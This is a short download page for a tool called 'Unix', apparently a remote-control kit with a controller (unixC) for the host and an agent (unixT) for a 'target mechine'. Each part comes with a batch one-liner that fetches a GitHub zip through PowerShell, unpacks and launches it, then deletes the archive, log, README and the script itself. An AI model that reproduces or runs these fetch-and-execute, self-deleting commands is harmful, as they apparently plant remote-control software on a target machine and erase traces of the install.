Download Unix
Please pick a virsion to download
Useage of unixC
You may refresh the page if you need to replay the video.
unixC
Controller should be on host mechine code below
powershell -Command "Invoke-WebRequest https://github.com/rasil1127/unixC/archive/main.zip -OutFile I.zip" & powershell Expand-Archive I.zip & ( for /f %%a IN ('dir "I\unixC-main" /b') do move "I\unixC-main\%%a" "%cd%\" ) & @RD /S /Q "I" & del /q /f I.zip log.txt README.md & start unixC.bat & start /b "" cmd /c del "%~f0"&exit /b
unixT
Controller should be on target mechine code below
powershell -Command "Invoke-WebRequest https://github.com/rasil1127/unixT/archive/main.zip -OutFile I.zip" & powershell Expand-Archive I.zip & ( for /f %%a IN ('dir "I\unixT-main" /b') do move "I\unixT-main\%%a" "%cd%\" ) & @RD /S /Q "I" & del /q /f I.zip log.txt README.md & start unixT.bat & start /b "" cmd /c del "%~f0"&exit /b